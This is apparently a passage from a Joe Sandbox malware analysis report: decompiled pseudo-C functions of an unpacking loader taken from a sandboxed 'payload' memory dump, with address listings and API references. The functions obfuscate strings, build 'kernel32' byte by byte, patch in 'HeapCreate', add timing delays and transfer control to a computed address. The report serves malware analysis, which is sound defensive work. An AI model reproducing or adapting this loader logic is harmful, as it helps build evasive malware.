    					asm("sbb dword [ecx], 0xa0");
    					if(__eflags < 0) {
    						goto L17;
    					}
    					 *0x405016 = GetProcAddress();
    					LoadLibraryA("kernel32.dll");
    					 *0x40501a = E004019C6;
    					_push(E00402749);
    					_pop(_t33);
    					 *0x40501a =  *0x40501a + _t33;
    					__eflags =  *((intOrPtr*)(_t48 - 4)) - 0xffffffff;
    					if( *((intOrPtr*)(_t48 - 4)) != 0xffffffff) {
    						 *0x40501a =  *0x40501a - E00402749;
    						goto __eax;
    					}
    					 *0x40501a =  *0x40501a ^ E004019C6;
    					goto __eax;
    				}
    				_push(1);
    				 *_t50 =  *_t50 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(_t12 != 0) {
    					goto L5;
    				}
    				_push( *0x4050cf);
    				_t36 = E00402AD0(_t12);
    				_push(1);
    				 *_t50 =  *_t50 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t36) != 0) {
    					goto L5;
    				}
    				_push(1);
    				 *_t50 =  *_t50 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(_t12 != 0) {
    					goto L5;
    				}
    				_push(E00401FE4);
    				return E00401FE4;
    			}

    0x0040193d
    0x0040193f
    0x00401942
    0x00401947
    0x00401953
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401959
    0x0040195b
    0x0040195e
    0x00401963
    0x0040196f
    0x00000000
    0x00000000
    0x00401975
    0x0040197b
    0x00401980
    0x00401982
    0x00401985
    0x0040198a
    0x00401997
    0x00000000
    0x00000000
    0x0040199d
    0x0040199f
    0x004019a2
    0x004019a7
    0x004019b3
    0x00000000
    0x00000000
    0x004019bf
    0x004019c0

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 46%
    			E0040299E() {
    				void* _t11;
    				void* _t12;
    				void* _t14;
    				struct HINSTANCE__* _t18;
    				void* _t19;
    				struct HINSTANCE__* _t22;
    				void* _t23;
    				void* _t24;
    				long _t26;
    				intOrPtr* _t28;
    				intOrPtr _t29;
    				void* _t34;
    				intOrPtr* _t37;
    				void* _t41;
    				void* _t45;
    				void* _t47;
    				intOrPtr* _t49;
    				void* _t59;
    
    				_push("zzdjjqpqaxlgt");
    				_t12 = E00402E18(_t11);
    				_push(1);
    				 *_t49 =  *_t49 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t12) != 0) {
    					L1:
    					_push(1);
    					 *_t49 =  *_t49 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t14 = E00401CAE(_t13); // executed
    					if(_t14 != 0 || _t47 < 0xfd00) {
    						L13:
    						L14:
    						goto L14;
    					} else {
    						 *0x305061 = 0x6b;
    						 *0x00305062 = 0x65;
    						 *0x00305063 = 0x72;
    						 *0x00305064 = 0x6e;
    						 *0x00305065 = 0x65;
    						 *0x00305066 = 0x6c;
    						 *0x00305067 = 0x33;
    						_t18 = LoadLibraryA("kernel32.dll");
    						 *0x40500e = _t18;
    						_t37 = "pejpCreate";
    						 *_t37 = 0x70616548;
    						 *((short*)(_t37 + 4)) = 0x7243;
    						 *((short*)(_t37 + 6)) = 0x6165;
    						_push(_t37);
    						_push(_t18);
    						_push(__imp__LoadLibraryExW);
    						_pop( *0x40500a);
    						_push(_t18);
    						_push(1);
    						 *_t49 =  *_t49 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t19 = E00401CAE(_t18); // executed
    						if(_t19 != 0) {
    							goto L13;
    						}
    						L"oidsapi.dll" = 0x6e;
    						M00405038 = 0x74;
    						_t22 = LoadLibraryExW( &((L"")[1]), 0, 0);
    						 *((intOrPtr*)(_t47 - 4)) = _t22;
    						_push(_t22);
    						if(_t22 == 0) {
    							goto L13;
    						}
    						_push("zzdjjqpqaxlgt"); // executed
    						_t23 = E00402E18(_t22); // executed
    						_push("true");
    						 *_t49 =  *_t49 - 1;
    						_push(0x4050b3);
    						_push("bkktdsxxkjueaz"); // executed
    						_t24 = E00402BB3(_t23); // executed
    						if(_t24 != 0) {
    							goto L13;
    						}
    						_push(0x1e);
    						do {
    							_t26 = WaitForSingleObject(0xffffffff, 1); // executed
    							 *_t49 =  *_t49 - 1;
    						} while ( *_t49 != 0);
    						 *0x40501a = 0;
    						_push("zzdjjqpqaxlgt"); // executed
    						E00402E18(_t26); // executed
    						_pop(_t41);
    						 *((intOrPtr*)(_t49 + 4)) =  *((intOrPtr*)(_t49 + 4)) +  *((intOrPtr*)(_t41 + 0x3c));
    						_t45 = _t41;
    						 *0x405002 = _t45 + 0xa4;
    						_t28 =  *0x405002;
    						_t29 =  *_t28;
    						 *0x405002 = _t29;
    						_t59 =  *0x405002 - 0xfff;
    						if(_t59 > 0) {
    							goto L13;
    						}
    						asm("sbb dword [ecx], 0xa0");
    						if(_t59 < 0) {
    							goto L13;
    						}
    						 *0x405016 = GetProcAddress();
    						LoadLibraryA("kernel32.dll");
    						 *0x40501a = E004019C6;
    						_push(E00402749);
    						_pop(_t34);
    						 *0x40501a =  *0x40501a + _t34;
    						if( *((intOrPtr*)(_t47 - 4)) != 0xffffffff) {
    							 *0x40501a =  *0x40501a - E00402749;
    							goto __eax;
    						}
    						 *0x40501a =  *0x40501a ^ E004019C6;
    						goto __eax;
    					}
    				}
    				_push("zzdjjqpqaxlgt");
    				__eax = E00402E18(__eax);
    				_push(0xf);
    				 *__esp =  *__esp - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				__eax = E00402BB3(__eax);
    				if(__eax != 0) {
    					goto L1;
    				}
    				_push(0xf);
    				 *__esp =  *__esp - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				__eax = E00402BB3(__eax);
    				if(__eax != 0) {
    					goto L1;
    				}
    				_push("zzdjjqpqaxlgt");
    				__eax = E00402E18(__eax);
    				_push("zzdjjqpqaxlgt");
    				__eax = E00402749;
    				_push(E00402749);
    				return E00402749;
    			}

    0x0040299e
    0x004029a3
    0x004029a8
    0x004029aa
    0x004029ad
    0x004029b2
    0x004029be
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x00401e4b
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401e34
    0x004029c4
    0x004029c9
    0x004029ce
    0x004029d0
    0x004029d3
    0x004029d8
    0x004029dd
    0x004029e5
    0x00000000
    0x00000000
    0x004029eb
    0x004029ed
    0x004029f0
    0x004029f5
    0x004029fa
    0x00402a01
    0x00000000
    0x00000000
    0x00402a07
    0x00402a0c
    0x00402a11
    0x00402a1b
    0x00402a21
    0x00402a22

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 46%
    			E0040274E() {
    				void* _t11;
    				void* _t13;
    				struct HINSTANCE__* _t17;
    				void* _t18;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				void* _t23;
    				long _t25;
    				intOrPtr* _t27;
    				intOrPtr _t28;
    				void* _t33;
    				intOrPtr* _t36;
    				void* _t40;
    				void* _t44;
    				void* _t46;
    				intOrPtr* _t48;
    				void* _t58;
    
    				_push(1);
    				 *_t48 =  *_t48 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t11) != 0) {
    					L1:
    					_push(1);
    					 *_t48 =  *_t48 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t13 = E00401CAE(_t12); // executed
    					if(_t13 != 0 || _t46 < 0xfd00) {
    						L13:
    						L14:
    						goto L14;
    					} else {
    						 *0x305061 = 0x6b;
    						 *0x00305062 = 0x65;
    						 *0x00305063 = 0x72;
    						 *0x00305064 = 0x6e;
    						 *0x00305065 = 0x65;
    						 *0x00305066 = 0x6c;
    						 *0x00305067 = 0x33;
    						_t17 = LoadLibraryA("kernel32.dll");
    						 *0x40500e = _t17;
    						_t36 = "pejpCreate";
    						 *_t36 = 0x70616548;
    						 *((short*)(_t36 + 4)) = 0x7243;
    						 *((short*)(_t36 + 6)) = 0x6165;
    						_push(_t36);
    						_push(_t17);
    						_push(__imp__LoadLibraryExW);
    						_pop( *0x40500a);
    						_push(_t17);
    						_push(1);
    						 *_t48 =  *_t48 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t18 = E00401CAE(_t17); // executed
    						if(_t18 != 0) {
    							goto L13;
    						}
    						L"oidsapi.dll" = 0x6e;
    						M00405038 = 0x74;
    						_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
    						 *((intOrPtr*)(_t46 - 4)) = _t21;
    						_push(_t21);
    						if(_t21 == 0) {
    							goto L13;
    						}
    						_push("zzdjjqpqaxlgt"); // executed
    						_t22 = E00402E18(_t21); // executed
    						_push("true");
    						 *_t48 =  *_t48 - 1;
    						_push(0x4050b3);
    						_push("bkktdsxxkjueaz"); // executed
    						_t23 = E00402BB3(_t22); // executed
    						if(_t23 != 0) {
    							goto L13;
    						}
    						_push(0x1e);
    						do {
    							_t25 = WaitForSingleObject(0xffffffff, 1); // executed
    							 *_t48 =  *_t48 - 1;
    						} while ( *_t48 != 0);
    						 *0x40501a = 0;
    						_push("zzdjjqpqaxlgt"); // executed
    						E00402E18(_t25); // executed
    						_pop(_t40);
    						 *((intOrPtr*)(_t48 + 4)) =  *((intOrPtr*)(_t48 + 4)) +  *((intOrPtr*)(_t40 + 0x3c));
    						_t44 = _t40;
    						 *0x405002 = _t44 + 0xa4;
    						_t27 =  *0x405002;
    						_t28 =  *_t27;
    						 *0x405002 = _t28;
    						_t58 =  *0x405002 - 0xfff;
    						if(_t58 > 0) {
    							goto L13;
    						}
    						asm("sbb dword [ecx], 0xa0");
    						if(_t58 < 0) {
    							goto L13;
    						}
    						 *0x405016 = GetProcAddress();
    						LoadLibraryA("kernel32.dll");
    						 *0x40501a = E004019C6;
    						_push(E00402749);
    						_pop(_t33);
    						 *0x40501a =  *0x40501a + _t33;
    						if( *((intOrPtr*)(_t46 - 4)) != 0xffffffff) {
    							 *0x40501a =  *0x40501a - E00402749;
    							goto __eax;
    						}
    						 *0x40501a =  *0x40501a ^ E004019C6;
    						goto __eax;
    					}
    				}
    				_push( *0x4050cf);
    				__eax = E00402AD0(__eax);
    				_push("zzdjjqpqaxlgt");
    				__eax = E00402E18(__eax);
    				_push(0xf);
    				 *__esp =  *__esp - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				__eax = E00402BB3(__eax);
    				if(__eax != 0) {
    					goto L1;
    				}
    				_push(0xf);
    				 *__esp =  *__esp - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				__eax = E00402BB3(__eax);
    				if(__eax != 0) {
    					goto L1;
    				}
    				_push("zzdjjqpqaxlgt");
    				__eax = E00402749;
    				_push(E00402749);
    				return E00402749;
    			}

    0x0040274e
    0x00402750
    0x00402753
    0x00402758
    0x00402765
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x00401e4b
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401e34
    0x0040276b
    0x00402771
    0x00402776
    0x0040277b
    0x00402780
    0x00402782
    0x00402785
    0x0040278a
    0x0040278f
    0x00402796
    0x00000000
    0x00000000
    0x0040279c
    0x0040279e
    0x004027a1
    0x004027a6
    0x004027ab
    0x004027b2
    0x00000000
    0x00000000
    0x004027b8
    0x004027c2
    0x004027c8
    0x004027c9

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 46%
    			E00401FE4() {
    				void* _t11;
    				void* _t12;
    				void* _t13;
    				void* _t14;
    				void* _t16;
    				struct HINSTANCE__* _t20;
    				void* _t21;
    				struct HINSTANCE__* _t24;
    				void* _t25;
    				void* _t26;
    				long _t28;
    				intOrPtr* _t30;
    				intOrPtr _t31;
    				void* _t36;
    				signed int _t37;
    				intOrPtr* _t40;
    				void* _t44;
    				void* _t48;
    				void* _t50;
    				intOrPtr* _t52;
    				void* _t61;
    
    				_push("zzdjjqpqaxlgt");
    				_t12 = E00402E18(_t11);
    				_push( *0x4050cf);
    				_t13 = E00402AD0(_t12);
    				_push("zzdjjqpqaxlgt");
    				_t14 = E00402E18(_t13);
    				_push(0xf);
    				 *_t52 =  *_t52 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t14) != 0) {
    					L1:
    					_push(1);
    					 *_t52 =  *_t52 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t16 = E00401CAE(_t15); // executed
    					if(_t16 != 0 || _t50 < 0xfd00) {
    						L16:
    						L17:
    						goto L17;
    					} else {
    						 *0x305061 = 0x6b;
    						 *0x00305062 = 0x65;
    						 *0x00305063 = 0x72;
    						 *0x00305064 = 0x6e;
    						 *0x00305065 = 0x65;
    						 *0x00305066 = 0x6c;
    						 *0x00305067 = 0x33;
    						_t20 = LoadLibraryA("kernel32.dll");
    						 *0x40500e = _t20;
    						_t40 = "pejpCreate";
    						 *_t40 = 0x70616548;
    						 *((short*)(_t40 + 4)) = 0x7243;
    						 *((short*)(_t40 + 6)) = 0x6165;
    						_push(_t40);
    						_push(_t20);
    						_push(__imp__LoadLibraryExW);
    						_pop( *0x40500a);
    						_push(_t20);
    						_push(1);
    						 *_t52 =  *_t52 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t21 = E00401CAE(_t20); // executed
    						if(_t21 != 0) {
    							goto L16;
    						}
    						L"oidsapi.dll" = 0x6e;
    						M00405038 = 0x74;
    						_t24 = LoadLibraryExW( &((L"")[1]), 0, 0);
    						 *((intOrPtr*)(_t50 - 4)) = _t24;
    						_push(_t24);
    						if(_t24 == 0) {
    							goto L16;
    						}
    						_push("zzdjjqpqaxlgt"); // executed
    						_t25 = E00402E18(_t24); // executed
    						_push("true");
    						 *_t52 =  *_t52 - 1;
    						_push(0x4050b3);
    						_push("bkktdsxxkjueaz"); // executed
    						_t26 = E00402BB3(_t25); // executed
    						if(_t26 != 0) {
    							goto L16;
    						}
    						_push(0x1e);
    						do {
    							_t28 = WaitForSingleObject(0xffffffff, 1); // executed
    							 *_t52 =  *_t52 - 1;
    						} while ( *_t52 != 0);
    						_t52 = _t52 + 4;
    						 *0x40501a = 0;
    						_push("zzdjjqpqaxlgt"); // executed
    						E00402E18(_t28); // executed
    						_pop(_t44);
    						 *_t52 =  *_t52 +  *((intOrPtr*)(_t44 + 0x3c));
    						_t48 = _t44;
    						 *0x405002 = _t48 + 0xa4;
    						_t30 =  *0x405002;
    						_t31 =  *_t30;
    						 *0x405002 = _t31;
    						_t61 =  *0x405002 - 0xfff;
    						if(_t61 > 0) {
    							goto L16;
    						}
    						asm("sbb dword [ecx], 0xa0");
    						if(_t61 < 0) {
    							goto L16;
    						}
    						 *0x405016 = GetProcAddress();
    						LoadLibraryA("kernel32.dll");
    						 *0x40501a = E004019C6;
    						_push(E00402749);
    						_pop(_t36);
    						 *0x40501a =  *0x40501a + _t36;
    						if( *((intOrPtr*)(_t50 - 4)) != 0xffffffff) {
    							 *0x40501a =  *0x40501a - E00402749;
    							_t37 =  *0x40501a; // 0x0
    							goto __eax;
    						}
    						 *0x40501a =  *0x40501a ^ E004019C6;
    						goto __eax;
    					}
    				}
    				_push(1);
    				 *_t52 =  *_t52 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t37) != 0) {
    					goto L1;
    				}
    				_push(1);
    				 *_t52 =  *_t52 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(_t15 != 0) {
    					goto L1;
    				}
    				_push(E00402749);
    				return E00402749;
    			}

    0x00401fe4
    0x00401fe9
    0x00401fee
    0x00401ff4
    0x00401ff9
    0x00401ffe
    0x00402003
    0x00402005
    0x00402008
    0x0040200d
    0x0040201a
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x00401e4b
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f27
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb7
    0x00401fca
    0x00401fd4
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401e34
    0x00402020
    0x00402022
    0x00402025
    0x0040202a
    0x00402037
    0x00000000
    0x00000000
    0x0040203d
    0x0040203f
    0x00402042
    0x00402047
    0x00402053
    0x00000000
    0x00000000
    0x0040205f
    0x00402060

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 49%
    			E00401DA1() {
    				void* _t11;
    				intOrPtr _t13;
    				struct HINSTANCE__* _t17;
    				intOrPtr _t18;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				intOrPtr _t23;
    				long _t25;
    				intOrPtr* _t27;
    				intOrPtr _t28;
    				void* _t33;
    				void* _t36;
    				void* _t37;
    				void* _t38;
    				intOrPtr* _t40;
    				void* _t44;
    				void* _t48;
    				void* _t50;
    				intOrPtr* _t52;
    
    				_push(1);
    				 *_t52 =  *_t52 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t11) != 0) {
    					L4:
    					_push(1);
    					 *_t52 =  *_t52 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t13 = E00401CAE(_t12); // executed
    					__eflags = _t13;
    					if(_t13 != 0) {
    						L16:
    						L17:
    						goto L17;
    					}
    					__eflags = _t50 - 0xfd00;
    					if(_t50 < 0xfd00) {
    						goto L16;
    					}
    					 *0x305061 = 0x6b;
    					 *0x00305062 = 0x65;
    					 *0x00305063 = 0x72;
    					 *0x00305064 = 0x6e;
    					 *0x00305065 = 0x65;
    					 *0x00305066 = 0x6c;
    					 *0x00305067 = 0x33;
    					_t17 = LoadLibraryA("kernel32.dll");
    					 *0x40500e = _t17;
    					_t40 = "pejpCreate";
    					 *_t40 = 0x70616548;
    					 *((short*)(_t40 + 4)) = 0x7243;
    					 *((short*)(_t40 + 6)) = 0x6165;
    					_push(_t40);
    					_push(_t17);
    					_push(__imp__LoadLibraryExW);
    					_pop( *0x40500a);
    					_push(_t17);
    					_push(1);
    					 *_t52 =  *_t52 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t18 = E00401CAE(_t17); // executed
    					__eflags = _t18;
    					if(_t18 != 0) {
    						goto L16;
    					}
    					L"oidsapi.dll" = 0x6e;
    					M00405038 = 0x74;
    					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
    					 *((intOrPtr*)(_t50 - 4)) = _t21;
    					_push(_t21);
    					__eflags = _t21;
    					if(_t21 == 0) {
    						goto L16;
    					}
    					_push("zzdjjqpqaxlgt"); // executed
    					_t22 = E00402E18(_t21); // executed
    					_push("true");
    					 *_t52 =  *_t52 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz"); // executed
    					_t23 = E00402BB3(_t22); // executed
    					__eflags = _t23;
    					if(_t23 != 0) {
    						goto L16;
    					}
    					_push(0x1e);
    					do {
    						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
    						 *_t52 =  *_t52 - 1;
    						__eflags =  *_t52;
    					} while ( *_t52 != 0);
    					 *0x40501a = 0;
    					_push("zzdjjqpqaxlgt"); // executed
    					E00402E18(_t25); // executed
    					_pop(_t44);
    					 *((intOrPtr*)(_t52 + 4)) =  *((intOrPtr*)(_t52 + 4)) +  *((intOrPtr*)(_t44 + 0x3c));
    					_t48 = _t44;
    					 *0x405002 = _t48 + 0xa4;
    					_t27 =  *0x405002;
    					_t28 =  *_t27;
    					 *0x405002 = _t28;
    					__eflags =  *0x405002 - 0xfff;
    					if(__eflags > 0) {
    						goto L16;
    					}
    					asm("sbb dword [ecx], 0xa0");
    					if(__eflags < 0) {
    						goto L16;
    					}
    					 *0x405016 = GetProcAddress();
    					LoadLibraryA("kernel32.dll");
    					 *0x40501a = E004019C6;
    					_push(E00402749);
    					_pop(_t33);
    					 *0x40501a =  *0x40501a + _t33;
    					__eflags =  *((intOrPtr*)(_t50 - 4)) - 0xffffffff;
    					if( *((intOrPtr*)(_t50 - 4)) != 0xffffffff) {
    						 *0x40501a =  *0x40501a - E00402749;
    						goto __eax;
    					}
    					 *0x40501a =  *0x40501a ^ E004019C6;
    					goto __eax;
    				}
    				_push("zzdjjqpqaxlgt");
    				_t36 = E00402E18(_t12);
    				_push("zzdjjqpqaxlgt");
    				_t37 = E00402E18(_t36);
    				_push(1);
    				 *_t52 =  *_t52 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t37) != 0) {
    					goto L4;
    				}
    				_push( *0x4050cf);
    				_t38 = E00402AD0(_t12);
    				_push(1);
    				 *_t52 =  *_t52 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t38) != 0) {
    					goto L4;
    				}
    				_push(E00402749);
    				return E00402749;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 48%
    			E004011B7() {
    				void* _t11;
    				void* _t12;
    				void* _t13;
    				intOrPtr _t15;
    				struct HINSTANCE__* _t19;
    				intOrPtr _t20;
    				struct HINSTANCE__* _t23;
    				void* _t24;
    				intOrPtr _t25;
    				long _t27;
    				intOrPtr* _t29;
    				intOrPtr _t30;
    				void* _t35;
    				intOrPtr* _t40;
    				void* _t44;
    				void* _t48;
    				void* _t50;
    				intOrPtr* _t52;
    
    				_push("zzdjjqpqaxlgt");
    				_t12 = E00402E18(_t11);
